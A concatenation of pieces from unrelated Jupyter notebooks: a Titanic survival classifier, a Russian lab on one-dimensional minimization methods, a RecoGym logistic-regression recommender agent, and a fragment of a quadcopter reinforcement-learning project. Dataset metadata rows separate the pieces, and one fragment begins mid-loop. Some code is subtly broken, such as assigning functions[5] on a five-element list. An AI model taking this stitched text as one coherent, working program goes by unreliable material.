train_df2['FareBand'] = pd.qcut(train_df2.Fare,7,labels=False)
test_df2['FareBand'] = pd.qcut(test_df2.Fare,7,labels=False)
# + _uuid="afdb50313a6382ce22541292d77fdf81210fb866"
# The raw continuous columns are now redundant; drop them in place.
train_df2.drop(['Age','Fare'],axis=1,inplace=True)
test_df2.drop(['Age','Fare'],axis=1,inplace=True)
# + [markdown] _uuid="182e5e6e936d18dbc08a8ee3c66b55c465060170"
# Let's take a final look at our training and testing data before we proceed to build our model.
# + _uuid="297a5a9578f8975dfddc73210f7f9d864ee170c1"
train_df2.head()
#sns.barplot('AgeBands','Survived',data=train_df2)
# + _uuid="2245e77e8bca32c98996abd9c1e51a61673a34de"
test_df2.head()
# + [markdown] _uuid="550343a009b9b2cea8cb16aff2c853ffd5114999"
# **7) Machine Learning**
#
# We will try out some different ML models to see which gives us the best result.
# the process will be as follows:
# * Importing the required machine learning libraries from scikit learn.
# * Splitting out training data into train and test datasets to check the performance of our model.
# * Try out different classifying model to see which fits the best.
# + _uuid="6ce4e5da8b9eed96c3fc1f464ddcac1fbd30555f"
#importing the required ML libraries
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV
from sklearn.metrics import accuracy_score
# + _uuid="f1e45a14064d3904a04a70d8ea4295fabfa7dde8"
# Features X (everything except the target) and target y (Survived).
X = train_df2.drop("Survived",axis=1)
y = train_df2["Survived"]
# Hold out 30% of the training data for evaluation; fixed seed for
# reproducibility.
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,random_state=42)
# + _uuid="647fec750a5707859d1cbab9184cd2da1d7fd3e4"
#Logistic Regression
logreg = LogisticRegression()
logreg.fit(X_train,y_train)
y_pred = logreg.predict(X_test)
acc_logreg = round(accuracy_score(y_pred, y_test) * 100, 2)
acc_logreg
# + [markdown] _uuid="3672cda23095026665476b748b7867ff8369d6fa"
# Our score also depends on how we had split our training data using *train_test_split*. We should also perform k-fold cross validation to get a more accurate score. Here we will be going with 5 folds.
# + _uuid="0ba802b05ebf0c86b9a56e44390e2d30b0803602"
#let's perform some K-fold cross validation for logistic Regression
cv_scores = cross_val_score(logreg,X,y,cv=5)
np.mean(cv_scores)*100
# + _uuid="7dd5e3d8b9294d7c5cd6ae9df62dbc704a1b26ee"
# Decision tree: grid-search max_depth over 1..9 with 5-fold CV on the
# full training data, then report the best depth and CV accuracy (%).
decisiontree = DecisionTreeClassifier()
dep = np.arange(1, 10)
param_grid = {'max_depth': dep}
clf_cv = GridSearchCV(decisiontree, param_grid=param_grid, cv=5)
clf_cv.fit(X, y)
# (Removed a dead `clf_cv.best_params_, clf_cv.best_score_*100` line: its
# tuple value was discarded because it was not the cell's last statement.)
print('Best value of max_depth:', clf_cv.best_params_)
print('Best score:', clf_cv.best_score_*100)
# + _uuid="e8f651e0eece9cba1642df1ea368d3aaa947e085"
#Random Forest CLassifier
random_forest = RandomForestClassifier()
ne = np.arange(1,20)
param_grid = {'n_estimators' : ne}
rf_cv = GridSearchCV(random_forest, param_grid=param_grid, cv=5)
rf_cv.fit(X, y)
print('Best value of n_estimators:',rf_cv.best_params_)
print('Best score:',rf_cv.best_score_*100)
# + _uuid="1c6bc7ef7c4a5b83247ea570e1d01d8dda0613af"
gbk = GradientBoostingClassifier()
ne = np.arange(1,20)
dep = np.arange(1,10)
param_grid = {'n_estimators' : ne,'max_depth' : dep}
gbk_cv = GridSearchCV(gbk, param_grid=param_grid, cv=5)
gbk_cv.fit(X, y)
print('Best value of parameters:',gbk_cv.best_params_)
print('Best score:',gbk_cv.best_score_*100)
# + [markdown] _uuid="2af1765ceafc960ae35e9bd2ef6725975b5ece19"
# **7) Submission.**
# Finally, we are ready to submit our solution to see where we rank. To do so we need to make a submission.csv file that contains only the PassengerId and our predictions for those ID's.
# + _uuid="dff1bc19b95dae6e7e69524e63dfde743ed688f9"
# Predict on the test split with the tuned decision tree (clf_cv).
# NOTE(review): the gradient-boosting search (gbk_cv) may score higher in
# cross-validation above -- consider submitting its predictions instead.
y_final = clf_cv.predict(test_df2)
# Two-column submission frame expected by Kaggle: PassengerId + prediction.
submission = pd.DataFrame({
    "PassengerId": test_passenger_df["PassengerId"],
    "Survived": y_final
})
# (Removed a dead `submission.head()` line: its value was discarded because
# it was not the cell's last statement.)
submission.to_csv('titanic.csv', index=False)
# + [markdown] _uuid="776ca155ff3e4a3092b33e8129ee075d1a28c4ab"
# I hope this notebook helped you out and please free to give any feedback or advice in the comments. I am new and this would help me out a lot!
#
# **Sources:**
# * [Titanic Data Science Solutions](https://www.kaggle.com/startupsci/titanic-data-science-solutions)
# * [Titanic Survival Predictions (Beginner)](https://www.kaggle.com/nadintamer/titanic-survival-predictions-beginner/notebook)
# * [Machine Learning with Kaggle: Feature Engineering](https://www.datacamp.com/community/tutorials/feature-engineering-kaggle)
| 22,933 |
/lab1/1d-unimode-minimization.ipynb
|
22572392cf32f19a8a5ee7f1b1e5a46d4c76c868
|
[] |
no_license
|
sevakon/optimization-methods
|
https://github.com/sevakon/optimization-methods
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,010,221 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Методы оптимизации
# ## Лабораторная работа #1
#
# ### Одномерная минимизация функции без производной
# ### Выполнили: Козар Илья, Коняхин Всеволод, M33051
# +
import pandas as pd
import numpy as np
import math
import matplotlib.pyplot as plt
# %matplotlib inline
# -
from methods import minimize_1d, plot_log_e_to_num_iters
# +
# define functions
def f1(x):
    """Degree-5 test polynomial; search interval [-0.5, 0.5]."""
    quintic = -5 * x ** 5
    quartic = 4 * x ** 4
    cubic = -12 * x ** 3
    quadratic = 11 * x ** 2
    linear = -2 * x
    return quintic + quartic + cubic + quadratic + linear + 1
def f2(x):
    """Squared-log test function; search interval [6, 9.9]."""
    left = math.log(x - 2, 10) ** 2
    right = math.log(10 - x, 10) ** 2
    return left + right - x ** 0.2
def f3(x):
    """Oscillating test function -3x*sin(0.75x) + exp(-2x); interval [0, 2*pi]."""
    oscillation = -3 * x * math.sin(0.75 * x)
    decay = math.exp(-2 * x)
    return oscillation + decay
def f4(x):
    """Sum of exponentials exp(3x) + 5*exp(-2x); search interval [0, 1]."""
    growth = math.exp(3 * x)
    decay = 5 * math.exp(-2 * x)
    return growth + decay
def f5(x):
    """Log-plus-quadratic test function; search interval [0.5, 2.5]."""
    log_term = 0.2 * x * math.log(x, 10)
    return log_term + (x - 2.3) ** 2
# -
# Test-objective specs: each entry bundles the callable, its search
# interval [a, b], and a LaTeX title used as the plot heading.
functions = [
    dict(fn=f1, a=-0.5, b=0.5, title="$f_1 = -5 x^5 + 4 x^4 - 12 x^3 + 11 x^2 - 2x + 1 $"),
    dict(fn=f2, a=6, b=9.9, title="$f_2 = \lg^2{(x-2)} + \lg^2{(10-x)} - x^{0.2}$"),
    dict(fn=f3, a=0, b=2 * math.pi, title="$f_3 = -3x \sin{(0.75 x)} + \exp{-2x}$"),
    dict(fn=f4, a=0, b=1, title="$f_4 = \exp{3x} + 5 \exp{-2x}$"),
    dict(fn=f5, a=0.5, b=2.5, title="$f_5 = 0.2 x \lg{x} + (x - 2.3)^2$"),
]
# ### Визуализация исходных функций
# Preview each objective on its search interval (40-point grid).
for spec in functions:
    grid = np.linspace(spec["a"], spec["b"], 40)
    values = [spec["fn"](t) for t in grid]
    plt.plot(grid, values)
    plt.title(spec["title"])
    plt.xlabel("X")
    plt.ylabel("Y")
    plt.show()
# ### Метод Дихотомии
# Dichotomy search on f1.  Each of the cells below repeats this same
# pattern for a different (objective, method) pair.
fn, method_name = functions[0], "dichotomy"
# Minimise to tolerance 1e-4; returns a per-iteration table and the minimum.
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
# Convergence plot (log-error vs. iteration count; see the `methods` helper).
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[1], "dichotomy"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[2], "dichotomy"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[3], "dichotomy"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[4], "dichotomy"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
# ### Метод золотого сечения
fn, method_name = functions[0], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[1], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[2], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[3], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[4], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
# ### Метод Фиббоначи
fn, method_name = functions[0], "fibonacci"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[1], "fibonacci"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[2], "fibonacci"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[3], "fibonacci"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[4], "fibonacci"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
# ### Метод парабол
fn, method_name = functions[0], "parabolic"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[1], "parabolic"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[2], "parabolic"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[3], "parabolic"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[4], "parabolic"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
# ### Комбинированный метод Брента
fn, method_name = functions[0], "brent"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.01, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[1], "brent"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[3], "brent"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[4], "brent"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
# ### Часть 3
# +
def f6(x):
    """Degree-6 test polynomial; multimodal on the interval [-1, 6.5]."""
    # Accumulate term by term, highest power first (same left-to-right
    # evaluation order as writing the polynomial out in one expression).
    value = 0.007 * x ** 6
    value -= 0.15 * x ** 5
    value += 1.14 * x ** 4
    value -= 3.5 * x ** 3
    value += 2.9 * x ** 2
    value += 2.95 * x
    value += 2.25
    return value
# Register a sixth, multimodal test function on the interval [-1, 6.5].
functions[5] = (dict(fn=f6, a=-1, b=6.5, title="$f_6 = 0.007 x^6 - 0.15 x^5 + 1.14 * x^4 - 3.5 x^3 + 2.9 x^2 + 2.95 x + 2.25$"))
# +
# Plot f6 so its multiple local minima are visible.
x = np.linspace(functions[5]["a"], functions[5]["b"], 40)
y = list(map(functions[5]["fn"], x))
plt.plot(x, y)
plt.title(functions[5]["title"])
plt.xlabel("X")
plt.ylabel("Y")
plt.show()
# -
# Run golden-section and Brent on the multimodal function; both assume
# unimodality, so they may converge to a local (not global) minimum.
fn, method_name = functions[5], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])

fn, method_name = functions[5], "brent"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
# На примере выше видно, что методы золотого сечения и Брента не смогли найти правильный минимум мультимодальной функции. Необходимое условие для корректной работы вышеописанных алгоритмов -- унимодальность функции на интересующем отрезке, поскольку сразу же в рассматриваемом интервале мы берем некоторые точки по середине и делаем сравнение значений функции на краях и в середине интервала. Такой подход не преподлагает наличие более одного экстремума (минимума).
| 9,319 |
/Quadcopter_Project.ipynb
|
9d17fe15b73b445fb2c97f7039b36bf7792d0e68
|
[] |
no_license
|
pawlokam/Quadcopter_RL
|
https://github.com/pawlokam/Quadcopter_RL
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 173,075 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# # !pip install recogym
# -
# # Likelihood-based models
#
# This notebook will outline the likelihood-based approach to training on Bandit feedback.
#
# Although before proceeding, we will study the output of the simulator in a little more detail.
# +
from numpy.random.mtrand import RandomState
from recogym import Configuration
from recogym.agents import Agent
from sklearn.linear_model import LogisticRegression
from recogym import verify_agents
from recogym.agents import OrganicUserEventCounterAgent, organic_user_count_args
from recogym.agents import RandomAgent, random_args
from recogym.evaluate_agent import verify_agents, plot_verify_agents
import gym, recogym
from copy import deepcopy
from recogym import env_1_args
import matplotlib.pyplot as plt
import numpy as np
# %matplotlib inline
# %config InlineBackend.figure_format = 'retina'
plt.rcParams['figure.figsize'] = [6, 3]
# RecoGym simulator configuration: 10 products, latent dimension K=5, fixed seed.
num_users = 4000
env_1_args['number_of_flips'] = 0
env_1_args['sigma_mu_organic'] = 0.0
env_1_args['sigma_omega'] = 1
env_1_args['random_seed'] = 42
env_1_args['num_products'] = 10
env_1_args['K'] = 5
# NOTE(review): this overrides the number_of_flips = 0 set a few lines above —
# presumably the later value (5) is the intended one; confirm.
env_1_args['number_of_flips'] = 5
env = gym.make('reco-gym-v1')
env.init_gym(env_1_args)
# -
# Generate organic/bandit logs for num_users simulated users; deepcopy leaves
# the original env untouched for the later verify_agents evaluation.
data = deepcopy(env).generate_logs(num_users)
# # Logistic Regression Model
#
# ## Turn Data into Features
#
# Now we are going to build a _Logistic Regression_ model.
#
# The model will predict _the probability of the click_ for the following data:
# * _`Views`_ is a total amount of views of a particular _`Product`_ shown during _Organic_ _`Events`_ **before** a _Bandit_ _`Event`_.
# * _`Action`_ is a proposed _`Product`_ at a _Bandit_ _`Event`_.
#
# For example, assume that we have _`10`_ products. In _Organic_ _`Events`_ , these products were shown to a user as follows:
#
# | Product Id | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
# |------------|---|---|---|---|---|---|---|---|----|---|
# | Views | 0 | 0 | 0 | 7 | 0 | 0 | 0 | 8 | 11 | 0 |
#
# When we want to know the probability of the click for _`Product`_ = _`8`_ with available amounts of _`Views`_ , the input data for the model will be:
#
# $v = $_`0 0 0 7 0 0 0 8 11 0`_ and _**`8`**_
#
# The first `10` numbers are _`Views`_ of _`Products`_ (see above), the latest one is the _`Action`_.
#
# We will try to predict: $\mathbb{P}(C|P=p, V)$ that is the probability of the click for a _`Product`_ $p$, provided that we have _`Views`_ $V$.
#
# We will encode _`Action`_ using a one-hot encoding.
# In our current example, the _`Action`_ is _`8`_. Thus, it is encoded as:
#
# _$a = $`0 0 0 0 0 0 0 0`_ _**`1`**_ _`0`_
#
# Here,
# * Vector of _`Actions`_ has a size that is equal to the _*number of `Products`*_ i.e., _`10`_.
# * _`Action`_ _`8`_ is marked as _`1`_ (_`Action`_ starts with _`0`_ ).
#
# Numerically, to fully describe the context $P=p, V$ that mixes the evaluated product and the products seen by the user, we do a Kronecker product of the two vectors $a$ and $v$.
# Namely, the vector used as features is the flattened version of the following $P \times P$ matrix
# $$
# \begin{pmatrix}
# \cdots & 0 & \cdots \\
# & \vdots & \\
# \cdots & v & \cdots \\
# & \vdots & \\
# \cdots & 0 & \cdots
# \end{pmatrix}
# \leftarrow \text{ only the line corresponding the the action $p$ is non zero}
# $$
# +
from recogym.agents import FeatureProvider
class CountFeatureProvider(FeatureProvider):
    """Represents a user as a vector of per-product organic view counts."""

    def __init__(self, config):
        super(CountFeatureProvider, self).__init__(config)
        # One counter per product; the index is the product id.
        self.feature_data = np.zeros(self.config.num_products)

    def observe(self, observation):
        """Fold the organic sessions of an observation into the view counters."""
        for session in observation.sessions():
            product_id = int(session['v'])
            self.feature_data[product_id] += 1

    def features(self, observation):
        """Return the current per-product view-count vector."""
        return self.feature_data

    def reset(self):
        """Start over with a fresh all-zero counter vector (new user)."""
        self.feature_data = np.zeros(self.config.num_products)
# +
import math
import numpy as np
from recogym import Configuration, DefaultContext, Observation
from recogym.envs.session import OrganicSessions
def build_train_data(logs, feature_provider):
    """Turn simulator logs into (user_state, action, reward, propensity) arrays.

    Organic rows accumulate into the user state via *feature_provider*; every
    bandit row emits one training example, with the state snapshotted *before*
    that row's action.
    """
    user_states, actions, rewards, proba_actions = [], [], [], []
    active_user = None
    for _, row in logs.iterrows():
        if active_user != row['u']:
            # New user: drop any pending organic session and reset the state.
            active_user = row['u']
            pending_session = OrganicSessions()
            feature_provider.reset()
        context = DefaultContext(row['u'], row['t'])
        if row['z'] == 'organic':
            pending_session.next(context, row['v'])
        else:
            # Bandit event: snapshot the user state, then record the shown
            # action, the click outcome and the logging propensity.
            feature_provider.observe(Observation(context, pending_session))
            user_states.append(feature_provider.features(None).copy())
            actions.append(row['a'])
            rewards.append(row['c'])
            proba_actions.append(row['ps'])
            # Start a new organic session for subsequent rows of this user.
            pending_session = OrganicSessions()
    return (np.array(user_states),
            np.array(actions).astype(int),
            np.array(rewards),
            np.array(proba_actions))
# +
# You can now see data that will be provided to our agents based on logistic regressions.
# Build the (state, action, reward, propensity) arrays once so we can inspect them.
config = Configuration(env_1_args)
count_feature_provider = CountFeatureProvider(config=config)
user_states, actions, rewards, proba_actions = build_train_data(data, count_feature_provider)
# +
# Peek at a few consecutive training examples.
preview_start, preview_size = 500, 3
print('User product views count at action time:')
print(user_states[preview_start:preview_start + preview_size])
print('Taken actions: ', actions[preview_start:preview_start + preview_size])
print('Obtained rewards: ', rewards[preview_start:preview_start + preview_size])
print('Probablities of the taken actions: ', proba_actions[preview_start:preview_start + preview_size])
# -
# Look at the data and see how it maps into the features - which is the combination of the history and the actions and the label, which is clicks. Note that only the bandit events correspond to records in the training data.
#
# To make a personalization, it is necessary to cross the action and history features. _Why_ ? We do the simplest possible to cross an element-wise Kronecker product.
class LikelihoodAgent(Agent):
    """Agent that fits a click-likelihood logistic regression and acts greedily on it."""

    def __init__(self, feature_provider, seed=43):
        self.feature_provider = feature_provider
        self.random_state = RandomState(seed)
        self.model = None

    @property
    def num_products(self):
        return self.feature_provider.config.num_products

    def _create_features(self, user_state, action):
        """Cross the user state with a one-hot action.

        Only the slice belonging to *action* carries the user state; every
        other position of the flattened (num_products x state) vector is zero.
        """
        width = len(user_state)
        crossed = np.zeros(width * self.num_products)
        start = action * width
        crossed[start:start + width] = user_state
        return crossed

    def train(self, logs):
        """Fit the logistic regression on the bandit events found in *logs*."""
        user_states, actions, rewards, _ = build_train_data(logs, self.feature_provider)
        design_matrix = np.vstack([
            self._create_features(state, action)
            for state, action in zip(user_states, actions)
        ])
        self.model = LogisticRegression(solver='lbfgs', max_iter=5000)
        self.model.fit(design_matrix, rewards)

    def _score_products(self, user_state):
        """Predicted click probability for every candidate product."""
        candidates = np.array([
            self._create_features(user_state, candidate)
            for candidate in range(self.num_products)
        ])
        return self.model.predict_proba(candidates)[:, 1]

    def act(self, observation, reward, done):
        """Greedily recommend the product with the highest predicted click probability."""
        self.feature_provider.observe(observation)
        user_state = self.feature_provider.features(observation)
        best = np.argmax(self._score_products(user_state))
        # Deterministic policy: all probability mass on the chosen product.
        propensities = np.zeros(self.num_products)
        propensities[best] = 1.0
        return {
            **super().act(observation, reward, done),
            'a': best,
            'ps': 1.0,
            'ps-a': propensities,
        }

    def reset(self):
        self.feature_provider.reset()
# +
# Have a look at the feature vector used by the Likelihood agent.
picked_sample = 500
count_product_views_feature_provider = CountFeatureProvider(config)
likelihood_logreg = LikelihoodAgent(count_product_views_feature_provider)

print('User state: ', user_states[picked_sample])
print('Action: ', actions[picked_sample])
print('Created cross features:')
print(likelihood_logreg._create_features(user_states[picked_sample], actions[picked_sample]))
# +
# %%time
# Fit the click model on the logged bandit events (can take a while).
likelihood_logreg = LikelihoodAgent(count_product_views_feature_provider)
likelihood_logreg.train(data)
# +
# Baselines: an organic-event-counter agent (sampling enabled) and a
# uniformly random agent.
organic_counter_agent = OrganicUserEventCounterAgent(
    Configuration({
        **organic_user_count_args,
        **env_1_args,
        'select_randomly': True,
    })
)
random_agent = RandomAgent(Configuration(random_args))
# +
# A/B-test the three agents on fresh simulated users.
result = verify_agents(
    env,
    number_of_users=2000,
    agents={
        'random agent': random_agent,
        'Organic Count': organic_counter_agent,
        'Likelihood LogReg': likelihood_logreg,
    }
)
# -
fig = plot_verify_agents(result)
plt.show()
i_episode in range(1, num_episodes+1):
state = agent.reset_episode() # start a new episode
while True:
action = agent.act(state)
next_state, reward, done = task.step(action)
agent.step(reward, done)
state = next_state
if done:
print("\rEpisode = {:4d}, score = {:7.3f} (best = {:7.3f}), noise_scale = {}".format(
i_episode, agent.score, agent.best_score, agent.noise_scale), end="") # [debug]
break
sys.stdout.flush()
# -
# This agent should perform very poorly on this task. And that's where you come in!
# ## Define the Task, Design the Agent, and Train Your Agent!
#
# Amend `task.py` to specify a task of your choosing. If you're unsure what kind of task to specify, you may like to teach your quadcopter to takeoff, hover in place, land softly, or reach a target pose.
#
# After specifying your task, use the sample agent in `agents/policy_search.py` as a template to define your own agent in `agents/agent.py`. You can borrow whatever you need from the sample agent, including ideas on how you might modularize your code (using helper methods like `act()`, `learn()`, `reset_episode()`, etc.).
#
# Note that it is **highly unlikely** that the first agent and task that you specify will learn well. You will likely have to tweak various hyperparameters and the reward function for your task until you arrive at reasonably good behavior.
#
# As you develop your agent, it's important to keep an eye on how it's performing. Use the code above as inspiration to build in a mechanism to log/save the total rewards obtained in each episode to file. If the episode rewards are gradually increasing, this is an indication that your agent is learning.
# +
## TODO: Train your agent here.
import sys
import numpy as np
import pandas as pd
import csv
from agents.agent import DDPG
from task import Task

#### Take off task ####

# Redefine variables declared earlier for convenience.
# Modify the values below to give the quadcopter a different starting position.
runtime = 5.                                    # time limit of the episode
init_pose = np.array([0., 0., 0., 0., 0., 0.])  # initial pose
init_velocities = np.array([0., 0., 0.])        # initial velocities
init_angle_velocities = np.array([0., 0., 0.])  # initial angle velocities
output_file = 'take_off_rewards.txt'            # file name for saved results

num_episodes = 1000
target_pos = np.array([0., 0., 10.])
task = Task(target_pos=target_pos)
agent = DDPG(task)
done = False

# Per-episode quantities logged to CSV and kept in memory for plotting.
labels = ['episode', 'total_reward', 'time', 'x', 'y', 'z', 'x_velocity',
          'y_velocity', 'z_velocity']
results = {x : [] for x in labels}

with open(output_file, 'w') as csvfile:
    writer = csv.writer(csvfile)
    writer.writerow(labels)
    best_total_reward = 0
    for i_episode in range(1,num_episodes+1):
        # Start a new episode and reset total reward.
        state = agent.reset_episode()
        total_reward = 0
        while True:
            action = agent.act(state)
            next_state, reward, done = task.step(action)
            total_reward += reward
            # NOTE(review): the *running* (mid-episode) total is compared here,
            # so best_total_reward can reflect a partial episode — confirm this
            # is the intended "best" definition.
            if total_reward > best_total_reward:
                best_total_reward = total_reward
            agent.step(action, reward, next_state, done)
            state = next_state
            if done:
                # Log the finished episode: reward plus final pose/velocity.
                data_to_write = [i_episode] + [total_reward] + [task.sim.time] + list(task.sim.pose) + list(task.sim.v)
                for i in range(len(labels)):
                    results[labels[i]].append(data_to_write[i])
                writer.writerow(data_to_write)
                print("\rEpisode = {:4d}, total_reward = {:7.3f} (best = {:7.3f})".format(
                    i_episode, total_reward, best_total_reward), end="")
                break
        sys.stdout.flush()
# -
# ## Plot the Rewards
#
# Once you are satisfied with your performance, plot the episode rewards, either from a single run, or averaged over multiple runs.
# +
## TODO: Plot the rewards.
'''Plot rewards for the take off task '''
import matplotlib.pyplot as plt
# %matplotlib inline
plt.plot(results['episode'], results['total_reward'])
#plt.legend()
_ = plt.ylim()
# -
# ## Reflections
#
# **Question 1**: Describe the task that you specified in `task.py`. How did you design the reward function?
#
# **Answer**: I specified the take off task in the task.py. I've restricted the reward to be between -1 and 1 - I found that it helped get more consistent rewards between different training attempts.
# **Question 2**: Discuss your agent briefly, using the following questions as a guide:
#
# - What learning algorithm(s) did you try? What worked best for you?
# - What was your final choice of hyperparameters (such as $\alpha$, $\gamma$, $\epsilon$, etc.)?
# - What neural network architecture did you use (if any)? Specify layers, sizes, activation functions, etc.
#
# **Answer**:
#
# Final values of hyperparameters:
# $\gamma$ = 0.99
#
# For both actor and critic classes I've used a neural networks.
# For the actor class I've created a neural network with 4 fully connected hidden layers with 32, 64, 128 and 64 units. For every layer I've used batch normalization, ReLu activation function and dropout (with probability equal to 0.5). Below I've pasted the implementation of one of the layers from agent.py:
#
# net = layers.Dense(units = 32, use_bias = False, kernel_regularizer = regularizers.l2(0.01), activity_regularizer = regularizers.l1(0.01))(states)
#
# net = layers.BatchNormalization()(net)
#
# net = layers.Activation('relu')(net)
#
# net = layers.Dropout(0.5)(net)
#
